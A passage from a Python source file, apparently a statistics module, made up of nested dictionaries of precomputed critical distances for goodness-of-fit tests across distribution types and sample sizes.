{'uni': 0.1912754452360089, 'nor': 0.9625954838302346, 'beta1': 0.1850480515459952, 'beta2': 1.0300633923301075, 'beta4': 0.10637413003748875}, 750: {'uni': 0.18945058480162008, 'nor': 0.7695073156807593, 'beta1': 0.18526507906977255, 'beta2': 0.8083193173277922, 'beta4': 0.1106638358872608}, 500: {'uni': 0.185620108086503, 'nor': 0.5726722059040364, 'beta1': 0.18357606652829983, 'beta2': 0.6528292568827052, 'beta4': 0.11579632790357713}, 400: {'uni': 0.18917591701097058, 'nor': 0.49529277931636245, 'beta1': 0.1834642136948372, 'beta2': 0.5381420829901148, 'beta4': 0.12006342755769683}, 300: {'uni': 0.18687744942049392, 'nor': 0.419608439413199, 'beta1': 0.18478819848060082, 'beta2': 0.45118218759273077, 'beta4': 0.1258962883197106}, 200: {'uni': 0.18418101094464367, 'nor': 0.33878294396897896, 'beta1': 0.1829759224784113, 'beta2': 0.37076816072824964, 'beta4': 0.13532357390907895}, 150: {'uni': 0.18418481072808665, 'nor': 0.29815778996985826, 'beta1': 0.18625340494055306, 'beta2': 0.3241801066525806, 'beta4': 0.13951205890829702}, 100: {'uni': 0.18327140323275803, 'nor': 0.26188762705474206, 'beta1': 0.18344353301364413, 'beta2': 0.2752468213062559, 'beta4': 0.1503016146561893}, 75: {'uni': 0.18201478524070183, 'nor': 0.24581445083697057, 'beta1': 0.1853887999165348, 'beta2': 0.2445694630913998, 'beta4': 0.15565064425067696}, 50: {'uni': 0.18452051279131734, 'nor': 0.222129436245253, 'beta1': 0.18516263138095312, 'beta2': 0.22467151056734352, 'beta4': 0.16108458373940354}, 30: {'uni': 0.1824891516495398, 'nor': 0.2053607180567544, 'beta1': 0.18509905830949186, 'beta2': 0.20779712298354724, 'beta4': 0.1699616752517214}, 20: {'uni': 0.18300669688455398, 'nor': 0.20274525612006072, 'beta1': 0.18328208302262802, 'beta2': 0.19765528888056297, 'beta4': 0.17491649721982203}, 10: {'uni': 0.1848066711618625, 'nor': 0.19231164434042297, 'beta1': 0.18438331438611105, 'beta2': 0.19484072521797707, 'beta4': 0.17971946823829243}}, 100: {1000: {'uni': 0.19811466492827273, 'nor': 1.3512753542524134, 'beta1': 0.18272420510815907, 'beta2': 1.1851946304410805, 'beta4': 0.1021515448919693}, 750: {'uni': 0.19486636364500992, 'nor': 1.0795208594455619, 'beta1': 0.1827435190842583, 'beta2': 0.8879856010389023, 'beta4': 0.10578996546915725}, 500: {'uni': 0.1878660706186934, 'nor': 0.7908944071120905, 'beta1': 0.18372014934617817, 'beta2': 0.7190908861845601, 'beta4': 0.10798328428429449}, 400: {'uni': 0.18856719881543738, 'nor': 0.6515181196215094, 'beta1': 0.18257792204790377, 'beta2': 0.6089945179002064, 'beta4': 0.11172974205029101}, 300: {'uni': 0.18480486550722386, 'nor': 0.5420471845411214, 'beta1': 0.18425739128256488, 'beta2': 0.49803792491577076, 'beta4': 0.1170983391444022}, 200: {'uni': 0.18410247561395535, 'nor': 0.4225705571887114, 'beta1': 0.1832629600404925, 'beta2': 0.3991187761792379, 'beta4': 0.12520010138008653}, 150: {'uni': 0.1831379504788031, 'nor': 0.35378535669622957, 'beta1': 0.18393102377460066, 'beta2': 0.3533201625197048, 'beta4': 0.1310612284316026}, 100: {'uni': 0.1851477358277497, 'nor': 0.30048949272859776, 'beta1': 0.18722881633512647, 'beta2': 0.2982703912186853, 'beta4': 0.13952949011220495}, 75: {'uni': 0.18420407052491966, 'nor': 0.2747464150268231, 'beta1': 0.1863893010233449, 'beta2': 0.2688833428777913, 'beta4': 0.14483526902687105}, 50: {'uni': 0.18272037174239453, 'nor': 0.24499943819688966, 'beta1': 0.18396142930712786, 'beta2': 0.23860133327254135, 'beta4': 0.15513414164226877}, 30: {'uni': 0.1842369811339266, 'nor': 0.21925965780532913, 'beta1': 0.18267665781136008, 'beta2': 0.21345155008926986, 'beta4': 0.16315465295018947}, 20: {'uni': 0.18596055862126862, 'nor': 0.20895267177449817, 'beta1': 0.18242691039042175, 'beta2': 0.20282499131835807, 'beta4': 0.17122285192412554}, 10: {'uni': 0.18557308492410754, 'nor': 0.19918179801171515, 'beta1': 0.1840271099140626, 'beta2': 0.1938309824025229, 'beta4': 0.1767417121054671}}, 75: {1000: {'uni': 0.20711268462000337, 'nor': 1.7730177547589154, 'beta1': 0.1869960981370644, 'beta2': 1.2726475334757859, 'beta4': 0.100342571351767}, 750: {'uni': 0.20243866747068975, 'nor': 1.3991570539695792, 'beta1': 0.18513552603442698, 'beta2': 1.0017005109802415, 'beta4': 0.10276510802172498}, 500: {'uni': 0.1965709888981754, 'nor': 0.9742389984198174, 'beta1': 0.18355281840357834, 'beta2': 0.80284673792362, 'beta4': 0.10644357393348948}, 400: {'uni': 0.19146567109436297, 'nor': 0.841354076993409, 'beta1': 0.1855585099111213, 'beta2': 0.6565346919964216, 'beta4': 0.10781413077990055}, 300: {'uni': 0.18767169125550484, 'nor': 0.6612307292158803, 'beta1': 0.18405456456460575, 'beta2': 0.575015165674034, 'beta4': 0.11340006488072128}, 200: {'uni': 0.18875684035705986, 'nor': 0.5001358507311437, 'beta1': 0.18514163593432517, 'beta2': 0.44825655120643315, 'beta4': 0.11771535031911876}, 150: {'uni': 0.18273849384781432, 'nor': 0.4231160741504525, 'beta1': 0.18561439219437587, 'beta2': 0.38137814444752033, 'beta4': 0.1262731157515569}, 100: {'uni': 0.18225839061196816, 'nor': 0.338619585958276, 'beta1': 0.18186852876160955, 'beta2': 0.31617844744686563, 'beta4': 0.13374500648884993}, 75: {'uni': 0.18299158238453536, 'nor': 0.29961345440771225, 'beta1': 0.18696060459585148, 'beta2': 0.28468953064421093, 'beta4': 0.13946308848404163}, 50: {'uni': 0.1832723234116953, 'nor': 0.26283989390926227, 'beta1': 0.18506600379584687, 'beta2': 0.24750497454599002, 'beta4': 0.1481327869764839}, 30: {'uni': 0.18191405722869375, 'nor': 0.23431812960162796, 'beta1': 0.18521277623339458, 'beta2': 0.22079273390393087, 'beta4': 0.1592348611407742}, 20: {'uni': 0.18473341697360826, 'nor': 0.2195649379961785, 'beta1': 0.18563835105682194, 'beta2': 0.20770543157127955, 'beta4': 0.16479815778328769}, 10: {'uni': 0.18506924782584366, 'nor': 0.20570651820563146, 'beta1': 0.1866075791349083, 'beta2': 0.19341244195911075, 'beta4': 0.17748207906313238}}, 50: {1000: {'uni': 0.24103040620532545, 'nor': 2.627239706679091, 'beta1': 0.1874509583911653, 'beta2': 1.5677617919882278, 'beta4': 0.09789020561766841}, 750: {'uni': 0.22444541668429782, 'nor': 2.015315850284036, 'beta1': 0.18823153541894252, 'beta2': 1.2133199248338002, 'beta4': 0.09979798541763203}, 500: {'uni': 0.2104911731606476, 'nor': 1.38982671099465, 'beta1': 0.18746213379969717, 'beta2': 0.9366731794445591, 'beta4': 0.10269358339160997}, 400: {'uni': 0.20531070615513639, 'nor': 1.148301345520581, 'beta1': 0.18554521120654618, 'beta2': 0.7860055480947616, 'beta4': 0.10501089981968535}, 300: {'uni': 0.19934989819705742, 'nor': 0.8993661590744696, 'beta1': 0.18318293203211186, 'beta2': 0.6644979497197328, 'beta4': 0.10756412793208994}, 200: {'uni': 0.1921846611195358, 'nor': 0.6606908760158289, 'beta1': 0.18423109397748733, 'beta2': 0.5140542101443047, 'beta4': 0.11311740549405308}, 150: {'uni': 0.18961104398723572, 'nor': 0.5431369687165466, 'beta1': 0.18627983842993445, 'beta2': 0.43577804383019, 'beta4': 0.11788729433993039}, 100: {'uni': 0.18510814836165915, 'nor': 0.43114936330892584, 'beta1': 0.18448355982106907, 'beta2': 0.35642356479702164, 'beta4': 0.12452405723524114}, 75: {'uni': 0.18347411444813314, 'nor': 0.3665250370541888, 'beta1': 0.18489904225754517, 'beta2': 0.3207238999009413, 'beta4': 0.13094014210262298}, 50: {'uni': 0.18152653854784864, 'nor': 0.3021554777109189, 'beta1': 0.1855837950623708, 'beta2': 0.26894400195384355, 'beta4': 0.13977255851048295}, 30: {'uni': 0.17944329155456532, 'nor': 0.25589954702925916, 'beta1': 0.18177564577800395, 'beta2': 0.2259481098108176, 'beta4': 0.15087949281315094}, 20: {'uni': 0.18285848202810834, 'nor': 0.23495619641475976, 'beta1': 0.18418902422158248, 'beta2': 0.21053639359909057, 'beta4': 0.16289925871937844}, 10: {'uni': 0.18270695707991996, 'nor': 0.2096678137972554, 'beta1': 0.18653089016810714, 'beta2': 0.19684068664753132, 'beta4': 0.1704553669593008}}, 30: {1000: {'uni': 0.35059610653095774, 'nor': 4.278063195318857, 'beta1': 0.20388816838421095, 'beta2': 1.930305431945286, 'beta4': 0.09798289618718463}, 750: {'uni': 0.30507003691713097, 'nor': 3.21820776280224, 'beta1': 0.19622584473615895, 'beta2': 1.5979743998440465, 'beta4': 0.09714954501361119}, 500: {'uni': 0.26008473519802, 'nor': 2.2497384827957188, 'beta1': 0.1924900551191556, 'beta2': 1.1740862526243834, 'beta4': 0.09932387680106194}, 400: {'uni': 0.246066913448192, 'nor': 1.8039541962199412, 'beta1': 0.19029154767051165, 'beta2': 0.9792810501146351, 'beta4': 0.10044308660904461}, 300: {'uni': 0.22837881683581426, 'nor': 1.3951249872303733, 'beta1': 0.18464244517695091, 'beta2': 0.7923064688616753, 'beta4': 0.10371786223959582}, 200: {'uni': 0.2096008117213653, 'nor': 0.9894495628252942, 'beta1': 0.18661453750912715, 'beta2': 0.6265848402430967, 'beta4': 0.1058001385440015}, 150: {'uni': 0.2047520758256172, 'nor': 0.7821984888895062, 'beta1': 0.18759321457289763, 'beta2': 0.5198694245808844, 'beta4': 0.10807280355877953}, 100: {'uni': 0.19121268890754203, 'nor': 0.5928634651322495, 'beta1': 0.1840954961076464, 'beta2': 0.4184841874770464, 'beta4': 0.11527272387605526}, 75: {'uni': 0.1912910963358721, 'nor': 0.48913096110692394, 'beta1': 0.18215208706652994, 'beta2': 0.3547928099573867, 'beta4': 0.11922051901033888}, 50: {'uni': 0.18440606056882947, 'nor': 0.39561565247457786, 'beta1': 0.18223908669314237, 'beta2': 0.30220319429490433, 'beta4': 0.12812440980731452}, 30: {'uni': 0.18222407004959135, 'nor': 0.30418682264129604, 'beta1': 0.18679408185790608, 'beta2': 0.2491166973284583, 'beta4': 0.13942212483224153}, 20: {'uni': 0.18097656955489333, 'nor': 0.26515944288371085, 'beta1': 0.18367253348921583, 'beta2': 0.22596040797528127, 'beta4': 0.14749125985662656}, 10: {'uni': 0.1812785781213858, 'nor': 0.22411839439365913, 'beta1': 0.18377973985540141, 'beta2': 0.20261486000614173, 'beta4': 0.16383998193988902}}, 20: {1000: {'uni': 0.557588775025206, 'nor': 6.23263722804059, 'beta1': 0.24824273547433398, 'beta2': 2.5916665978624773, 'beta4': 0.09556521996049769}, 750: {'uni': 0.45544548344679703, 'nor': 4.960783858737055, 'beta1': 0.2315334208360766, 'beta2': 2.116834484867373, 'beta4': 0.09605379123194507}, 500: {'uni': 0.36047636166919345, 'nor': 3.2882260206430223, 'beta1': 0.21162692388832308, 'beta2': 1.4976707301720542, 'beta4': 0.09610105856086308}, 400: {'uni': 0.3196200397941912, 'nor': 2.6396332773464715, 'beta1': 0.2046928363598519, 'beta2': 1.265541898484928, 'beta4': 0.09827851131902052}, 300: {'uni': 0.28281307995759886, 'nor': 2.011907686223302, 'beta1': 0.1998415817930172, 'beta2': 0.9828568650064285, 'beta4': 0.09994987623415}, 200: {'uni': 0.24538969043580305, 'nor': 1.407599774702493, 'beta1': 0.19433833988424531, 'beta2': 0.7602852314379016, 'beta4': 0.10173240503051327}, 150: {'uni': 0.22623111278829658, 'nor': 1.1172309316240872, 'beta1': 0.1893663211990802, 'beta2': 0.6112263086634806, 'beta4': 0.10524857569135072}, 100: {'uni': 0.21033799716194235, 'nor': 0.7960728357807297, 'beta1': 0.18863382329214456, 'beta2': 0.48583796438531557, 'beta4': 0.10944951155940488}, 75: {'uni': 0.20239363660320567, 'nor': 0.653354873083433, 'beta1': 0.18465183242228214, 'beta2': 0.40852522362409677, 'beta4': 0.11117099248230677}, 50: {'uni': 0.19241628654888826, 'nor': 0.49230178420719256, 'beta1': 0.18370029558550202, 'beta2': 0.3315673506671088, 'beta4': 0.12034526923407932}, 30: {'uni': 0.1838470566331029, 'nor': 0.3690970245177923, 'beta1': 0.18158906884639572, 'beta2': 0.2703572480667707, 'beta4': 0.1305763969399149}, 20: {'uni': 0.18439013813515145, 'nor': 0.3113933846355926, 'beta1': 0.18171723618996996, 'beta2': 0.2369287296609353, 'beta4': 0.13967615415157159}, 10: {'uni': 0.18179638952526822, 'nor': 0.24629649064457582, 'beta1': 0.18144757035417675, 'beta2': 0.20971828838261652, 'beta4': 0.15608505701021883}}, 10: {1000: {'uni': 1.630169780842474, 'nor': 13.623294187847977, 'beta1': 0.6537074318170204, 'beta2': 4.838110857510732, 'beta4': 0.09413800337231777}, 750: {'uni': 1.2606778724851384, 'nor': 9.898087519223337, 'beta1': 0.5360828395709647, 'beta2': 3.755077850787192, 'beta4': 0.09609909813587005}, 500: {'uni': 0.866979270399114, 'nor': 6.86185146993719, 'beta1': 0.40719109616766064, 'beta2': 2.486938148944695, 'beta4': 0.09657207917263508}, 400: {'uni': 0.7234311603303463, 'nor': 5.533257506558093, 'beta1': 0.35555181458287194, 'beta2': 2.0684678266516845, 'beta4': 0.09575639679537408}, 300: {'uni': 0.5740562572746054, 'nor': 4.13961208846063, 'beta1': 0.30947004057833194, 'beta2': 1.5733033072118243, 'beta4': 0.09716579757282962}, 200: {'uni': 0.43012982000413774, 'nor': 2.806431923980102, 'beta1': 0.25923513854877184, 'beta2': 1.1217059286617272, 'beta4': 0.09769834869400658}, 150: {'uni': 0.3660568810176042, 'nor': 2.165907302955124, 'beta1': 0.2367881673186339, 'beta2': 0.8900796906245184, 'beta4': 0.0986555241279555}, 100: {'uni': 0.2963521456078561, 'nor': 1.4423314673071785, 'beta1': 0.21603240846651683, 'beta2': 0.6539876622911982, 'beta4': 0.101203675655721}, 75: {'uni': 0.26296739530637186, 'nor': 1.1761992322784602, 'beta1': 0.20484690859183285, 'beta2': 0.5351984389092316, 'beta4': 0.10492040345498926}, 50: {'uni': 0.22994652917703381, 'nor': 0.8431170822039252, 'beta1': 0.19350639779310821, 'beta2': 0.43102251731484564, 'beta4': 0.10827771561061793}, 30: {'uni': 0.2033383416551495, 'nor': 0.5806932221078154, 'beta1': 0.18502168086844142, 'beta2': 0.3218406334608748, 'beta4': 0.11399907323057486}, 20: {'uni': 0.1923057509260784, 'nor': 0.44699498766501866, 'beta1': 0.18199021346561728, 'beta2': 0.26969550832768435, 'beta4': 0.12249371308737968}, 10: {'uni': 0.17887078242976767, 'nor': 0.31761146933960366, 'beta1': 0.1766444136945467, 'beta2': 0.21765707501491735, 'beta4': 0.13832752334780735}}}} # skipcq: FLK-E231, FLK-E501 # List of the critical distances to charactersitics of distributions. # These distances are used to prevent adapting too much on an anomalous sample in the gof tests. self.crit_dist_upd_cm = {0.05: {1000: {1000: {'uni': 0.013833831976126072, 'beta1': 0.0003329885568229087, 'beta2': 0.22974622882027226, 'beta4': [0.0018908295164874612, 1.0697194182314242]}, 750: {'uni': 0.016990917368002133, 'beta1': 0.0006113165919820284, 'beta2': 0.23684284676662615, 'beta4': [0.002770944333718528, 1.0556667242656854]}, 500: {'uni': 0.023600774750904736, 'beta1': 0.0009199173841866722, 'beta2': 0.2753909552830473, 'beta4': [0.0037082814337906045, 1.0482794905722563]}, 400: {'uni': 0.02640029217064558, 'beta1': 0.0013622133600444137, 'beta2': 0.27352545783196475, 'beta4': [0.005913349923484303, 1.0456546892584218]}, 300: {'uni': 0.04006129826220925, 'beta1': 0.002720238345700929, 'beta2': 0.292583092890596, 'beta4': [0.007281293542356923, 1.0400206581224385]}, 200: {'uni': 0.07032909758220027, 'beta1': 0.005970864163422045, 'beta2': 0.34167794009457075, 'beta4': [0.009494471525280058, 1.0349849380276617]}, 150: {'uni': 0.1012642936451668, 'beta1': 0.013652756645306451, 'beta2': 0.39479224192835694, 'beta4': [0.01194023988657095, 1.0281722066537058]}, 100: {'uni': 0.13313776389084864, 'beta1': 0.022784367464349673, 'beta2': 0.41847533458373803, 'beta4': [0.020038218784910505, 1.0236478943934566]}, 75: {'uni': 0.14039046466276972, 'beta1': 0.04097056181025277, 'beta2': 0.46162284607879156, 'beta4': [0.0243947240305133, 1.0222016752862486]}, 50: {'uni': 0.22621965744544004, 'beta1': 0.0737194908849337, 'beta2': 0.517884604992627, 'beta4': [0.03269564227543516, 1.0182370445806526]}, 30: {'uni': 0.3065027272179305, 'beta1': 0.19186519999119622, 'beta2': 0.6071682127005255, 'beta4': [0.05374474739717058, 1.0137406936599733]}, 20: {'uni': 0.4579999299085743, 'beta1': 0.26347326935911947, 'beta2': 0.6609864081120751, 'beta4': [0.07348286747648815, 1.0145791780700397]}, 10: {'uni': 0.7093161375782928, 'beta1': 0.5119588745735099, 'beta2': 0.8207303938633076, 'beta4': [0.12023859377021034, 1.0100370019812506]}}, 750: {1000: {'uni': 0.01647447307790564, 'beta1': 0.0005070015607912077, 'beta2': 0.2629768360729676, 'beta4': [0.0033495902420869147, 1.0812966928373942]}, 750: {'uni': 0.018829802981785562, 'beta1': 0.0004891759389985897, 'beta2': 0.264938253953924, 'beta4': [0.0031531587883013427, 1.0792673641589363]}, 500: {'uni': 0.024080037100477052, 'beta1': 0.0012244937314284828, 'beta2': 0.24359686255819019, 'beta4': [0.004206903547084224, 1.076095067847491]}, 400: {'uni': 0.027584807407406455, 'beta1': 0.0016752340265126897, 'beta2': 0.26260070623151555, 'beta4': [0.005580712827419352, 1.060010603580021]}, 300: {'uni': 0.05146390929515149, 'beta1': 0.0026509847812920093, 'beta2': 0.303092230265923, 'beta4': [0.006365207456983704, 1.0541922110575421]}, 200: {'uni': 0.059327890449950973, 'beta1': 0.006979003319027128, 'beta2': 0.31285174277571925, 'beta4': [0.010945442489642966, 1.0474108448665012]}, 150: {'uni': 0.07603679549416355, 'beta1': 0.013496169428675047, 'beta2': 0.3555003501031682, 'beta4': [0.012749501962998663, 1.0375483550076372]}, 100: {'uni': 0.10561248103143273, 'beta1': 0.03187318794369734, 'beta2': 0.417146268097644, 'beta4': [0.020713494340326415, 1.0335080956133786]}, 75: {'uni': 0.14405962731563504, 'beta1': 0.043732800833889925, 'beta2': 0.4610806633425333, 'beta4': [0.02597652100879122, 1.0295014609635151]}, 50: {'uni': 0.20966063546789582, 'beta1': 0.07890839084581142, 'beta2': 0.5102418622987501, 'beta4': [0.043904941213022464, 1.0248461468788301]}, 30: {'uni': 0.38962310099779707, 'beta1': 0.1915135222435897, 'beta2': 0.6101573464223917, 'beta4': [0.06118300251929863, 1.0194659530900299]}, 20: {'uni': 0.428272065096665, 'beta1': 0.2518149043542126, 'beta2': 0.6947446253738557, 'beta4': [0.07492008381074046, 1.017655002271037]}, 10: {'uni': 0.7045396300117182, 'beta1': 0.5239027718500835, 'beta2': 0.8357669029306978, 'beta4': [0.11572334717911056, 1.0123883559270712]}}, 500: {1000: {'uni': 0.027224573572945946, 'beta1': 0.0013397428793559755, 'beta2': 0.3001985870543363, 'beta4': [0.004003070786742122, 1.1172596869640967]}, 750: {'uni': 0.028043993584209094, 'beta1': 0.0010541824335439582, 'beta2': 0.2823382920552223, 'beta4': [0.0036581315313476436, 1.1034623133987689]}, 500: {'uni': 0.02471763430703555, 'beta1': 0.0012248560308923057, 'beta2': 0.3307660083666149, 'beta4': [0.003302816728501824, 1.0934914146805519]}, 400: {'uni': 0.03236939986555113, 'beta1': 0.001492188135934995, 'beta2': 0.2834271159680854, 'beta4': [0.005281401022483379, 1.0858354786705675]}, 300: {'uni': 0.03914763722813296, 'beta1': 0.003120837500885247, 'beta2': 0.3326263681825811, 'beta4': [0.0059725430409256035, 1.080984369602341]}, 200: {'uni': 0.0674042868008787, 'beta1': 0.006767448043648924, 'beta2': 0.3349053851571213, 'beta4': [0.011969283802141791, 1.064357245786229]}, 150: {'uni': 0.082100927216335, 'beta1': 0.015091611739326043, 'beta2': 0.36047891136615184, 'beta4': [0.012143500193535273, 1.0603960329700548]}, 100: {'uni': 0.11090915635366168, 'beta1': 0.027855094159398915, 'beta2': 0.3960346148033574, 'beta4': [0.019873043933564375, 1.046442261406773]}, 75: {'uni': 0.13673584694945418, 'beta1': 0.04335726498923612, 'beta2': 0.46353116897047625, 'beta4': [0.022393899130873997, 1.0454004320894406]}, 50: {'uni': 0.26894500541594535, 'beta1': 0.07457662656723034, 'beta2': 0.5208863650222786, 'beta4': [0.036275561342054785, 1.0352702855461442]}, 30: {'uni': 0.3716936672337271, 'beta1': 0.17149387158728827, 'beta2': 0.6186004901982012, 'beta4': [0.06131349205497524, 1.0286449977262795]}, 20: {'uni': 0.467854736258422, 'beta1': 0.2513799996100335, 'beta2': 0.7006936802929652, 'beta4': [0.08626269634774561, 1.0230576102360847]}, 10: {'uni': 0.7362089605117925, 'beta1': 0.56086440263617, 'beta2': 0.8099518386992302, 'beta4': [0.11677030825502484, 1.0190838199658914]}}, 400: {1000: {'uni': 0.025284520784155894, 'beta1': 0.0016403734885094123, 'beta2': 0.31576478638382965, 'beta4': [0.004799521441428401, 1.149091195956356]}, 750: {'uni': 0.027799931928113246, 'beta1': 0.0015799682859719154, 'beta2': 0.3713849781520663, 'beta4': [0.004689070159467552, 1.124317344925337]}, 500: {'uni': 0.027483125208737986, 'beta1': 0.0024269483783257067, 'beta2': 0.27701755632147346, 'beta4': [0.004591320892501386, 1.1297845739588293]}, 400: {'uni': 0.03084627816775358, 'beta1': 0.0023979691180455814, 'beta2': 0.2730921713151016, 'beta4': [0.004974023608712, 1.106968985947837]}, 300: {'uni': 0.04342497872614666, 'beta1': 0.005122316708978925, 'beta2': 0.30396801422598557, 'beta4': [0.005941217951056899, 1.0999705260170498]}, 200: {'uni': 0.06731729987144204, 'beta1': 0.006636474398841804, 'beta2': 0.32885187834473645, 'beta4': [0.00949566072118334, 1.0888691708222482]}, 150: {'uni': 0.08264251761514971, 'beta1': 0.010132361123248543, 'beta2': 0.36101864325194, 'beta4': [0.012446278508938115, 1.0763280315015658]}, 100: {'uni': 0.10637172944422692, 'beta1': 0.01878644943776261, 'beta2': 0.4093008044094355, 'beta4': [0.020820333377676758, 1.06113616348469]}, 75: {'uni': 0.13795394349254128, 'beta1': 0.038995240660645046, 'beta2': 0.4405290225383519, 'beta4': [0.02473764963709022, 1.0527356149901959]}, 50: {'uni': 0.2406132500211715, 'beta1': 0.0700599044565557, 'beta2': 0.5265650730092543, 'beta4': [0.0339903732354553, 1.0462654860073552]}, 30: {'uni': 0.3173806374952389, 'beta1': 0.18444265554793618, 'beta2': 0.6325883170629072, 'beta4': [0.06610429250040999, 1.0355934184804019]}, 20: {'uni': 0.423548511058078, 'beta1': 0.25465448942736657, 'beta2': 0.6725333843878142, 'beta4': [0.07438553906653562, 1.0311030590947072]}, 10: {'uni': 0.6688467656594845, 'beta1': 0.5112523271928556, 'beta2': 0.8293005648094274, 'beta4': [0.1197769525104218, 1.0249310486188403]}}, 300: {1000: {'uni': 0.03646544382648058, 'beta1': 0.003251490535066205, 'beta2': 0.3201872293239301, 'beta4': [0.006951397024167792, 1.193926518402875]}, 750: {'uni': 0.03648594176728415, 'beta1': 0.002636200271072265, 'beta2': 0.3174843999565502, 'beta4': [0.006473086994037532, 1.183601205377894]}, 500: {'uni': 0.04072652314645194, 'beta1': 0.002558944110032064, 'beta2': 0.3251984717738673, 'beta4': [0.007789765735562143, 1.1835748123967167]}, 400: {'uni': 0.0393383633533453, 'beta1': 0.003847932927579061, 'beta2': 0.2860643127801613, 'beta4': [0.0062386354375463336, 1.1654789898222022]}, 300: {'uni': 0.04397095573137874, 'beta1': 0.0030280024317967777, 'beta2': 0.3789180859983394, 'beta4': [0.009249413107330818, 1.127841007910807]}, 200: {'uni': 0.06792667259937368, 'beta1': 0.005983841955930665, 'beta2': 0.3413062807433401, 'beta4': [0.009552799854332017, 1.0999288094012698]}, 150: {'uni': 0.0869747164851829, 'beta1': 0.012290799030814667, 'beta2': 0.3649645571564334, 'beta4': [0.014748639591924993, 1.0996203885277052]}, 100: {'uni': 0.11636318979764056, 'beta1': 0.02817460092180575, 'beta2': 0.4096280985600957, 'beta4': [0.01922673614387383, 1.0813822423223525]}, 75: {'uni': 0.15706280301874442, 'beta1': 0.039130351614999406, 'beta2': 0.42263093869109436, 'beta4': [0.024857576975933136, 1.0690602414012946]}, 50: {'uni': 0.28048873616461506, 'beta1': 0.06810514058491184, 'beta2': 0.5234093698507445, 'beta4': [0.037664123441808646, 1.0630363349497096]}, 30: {'uni': 0.3213033129924418, 'beta1': 0.16748462352883312, 'beta2': 0.6323735870294098, 'beta4': [0.05278897520198084, 1.0554917161294344]}, 20: {'uni': 0.5291733323766079, 'beta1': 0.2881578438762836, 'beta2': 0.7065202369109715, 'beta4': [0.07581480967034805, 1.043877964407442]}, 10: {'uni': 0.6636936363784581, 'beta1': 0.5173161477349097, 'beta2': 0.8275178393484293, 'beta4': [0.11949087211913659, 1.030446523297133]}}, 200: {1000: {'uni': 0.056736728276972896, 'beta1': 0.006839089656716795, 'beta2': 0.3272153807911214, 'beta4': [0.008455904960003245, 1.248625041859922]}, 750: {'uni': 0.05163279737714969, 'beta1': 0.010730487701533719, 'beta2': 0.3635515979264522, 'beta4': [0.007813754917837435, 1.2349194372374692]}, 500: {'uni': 0.05338620611203703, 'beta1': 0.006038477096334755, 'beta2': 0.3359196893924308, 'beta4': [0.011917568033129048, 1.2117966329062095]}, 400: {'uni': 0.058860799267621965, 'beta1': 0.0063165150330285426, 'beta2': 0.3789779915309377, 'beta4': [0.009755269735322647, 1.1804431185986555]}, 300: {'uni': 0.07153008954664851, 'beta1': 0.011047298709712905, 'beta2': 0.42900186641443894, 'beta4': [0.009584723093740515, 1.1880360664225362]}, 200: {'uni': 0.06344836733337247, 'beta1': 0.00781338886239747, 'beta2': 0.38781497493064176, 'beta4': [0.009797652441966509, 1.1638617512261697]}, 150: {'uni': 0.07459560420290043, 'beta1': 0.014056540580835258, 'beta2': 0.39046599800764625, 'beta4': [0.01168897465145889, 1.143775876304623]}, 100: {'uni': 0.11462970160562651, 'beta1': 0.025847066135830016, 'beta2': 0.39498442294942704, 'beta4': [0.01690940914502444, 1.1220874640395795]}, 75: {'uni': 0.14759832305943538, 'beta1': 0.047967300368844945, 'beta2': 0.43098417504532077, 'beta4': [0.031171793994368147, 1.1060770360134216]}, 50: {'uni': 0.23542071804173764, 'beta1': 0.09719199816075956, 'beta2': 0.5013506677050935, 'beta4': [0.03824146010789057, 1.1001663175850784]}, 30: {'uni': 0.3096592063935794, 'beta1': 0.15176694546522967, 'beta2': 0.5802936759286862, 'beta4': [0.0520104795571762, 1.0790703149850533]}, 20: {'uni': 0.45262915303228857, 'beta1': 0.261027201183725, 'beta2': 0.6364867032723682, 'beta4': [0.07130296373607303, 1.0621513268964007]}, 10: {'uni': 0.7295542697541142, 'beta1': 0.5124743313750191, 'beta2': 0.8144547112453855, 'beta4': [0.12479877669495536, 1.0515776201768678]}}, 150: {1000: {'uni': 0.07909618379520475, 'beta1': 0.009086321462188735, 'beta2': 0.4106450929510854, 'beta4': [0.012610658427334429, 1.2924313816625217]}, 750: {'uni': 0.07407325699561099, 'beta1': 0.014177338709786392, 'beta2': 0.4420930391617977, 'beta4': [0.014296507845962717, 1.3032443798682725]}, 500: {'uni': 0.07511369957824804, 'beta1': 0.01459171218041179, 'beta2': 0.47288468448977605, 'beta4': [0.013729395246877836, 1.251141347455903]}, 400: {'uni': 0.06944188808191638, 'beta1': 0.011176061659909423, 'beta2': 0.4035923111579738, 'beta4': [0.0125839858594099, 1.252919423776858]}, 300: {'uni': 0.06438335011755501, 'beta1': 0.016931344535076297, 'beta2': 0.4162306964573891, 'beta4': [0.010744824447481266, 1.222923097027982]}, 200: {'uni': 0.083964124476108, 'beta1': 0.014056137289547922, 'beta2': 0.4075437900930126, 'beta4': [0.013111563370934956, 1.2255955330645523]}, 150: {'uni': 0.07981799506756729, 'beta1': 0.01064409388613912, 'beta2': 0.3894789166335232, 'beta4': [0.023018732181305603, 1.2038155048533767]}, 100: {'uni': 0.14488849486361138, 'beta1': 0.020965041261413544, 'beta2': 0.5435612537940565, 'beta4': [0.01967025175597771, 1.1751658929630506]}, 75: {'uni': 0.12897242715258447, 'beta1': 0.05785618914959902, 'beta2': 0.4826347696087146, 'beta4': [0.02126529804324562, 1.1451923798322048]}, 50: {'uni': 0.21140150701110877, 'beta1': 0.10005146878076632, 'beta2': 0.5218040110926477, 'beta4': [0.036922327127357234, 1.1380283919405332]}, 30: {'uni': 0.31984297162744296, 'beta1': 0.1673346729784614, 'beta2': 0.5899636395543545, 'beta4': [0.056428456138648345, 1.0993767784566557]}, 20: {'uni': 0.4803508464303079, 'beta1': 0.2591276485033553, 'beta2': 0.6504322077039979, 'beta4': [0.07569043282680564, 1.0812645201801898]}, 10: {'uni': 0.6662991959861223, 'beta1': 0.5623584413477307, 'beta2': 0.7961858685655749, 'beta4': [0.11637566937767005, 1.0580619720265005]}}, 100: {1000: {'uni': 0.14063611585827807, 'beta1': 0.031228653444278272, 'beta2': 0.47970305740153707, 'beta4': [0.02119406846518135, 1.4093426070113058]}, 750: {'uni': 0.11080279866278557, 'beta1': 0.024578272682976215, 'beta2': 0.4781884547127654, 'beta4': [0.017108452919179756, 1.41979885240354]}, 500: {'uni': 0.11770170054806148, 'beta1': 0.022738881695332867, 'beta2': 0.5844182960912642, 'beta4': [0.019660423184423573, 1.4047538191133986]}, 400: {'uni': 0.09926981160838831, 'beta1': 0.02219582292278474, 'beta2': 0.671019314550252, 'beta4': [0.02316966058932741, 1.3998233294106437]}, 300: {'uni': 0.11165748604091662, 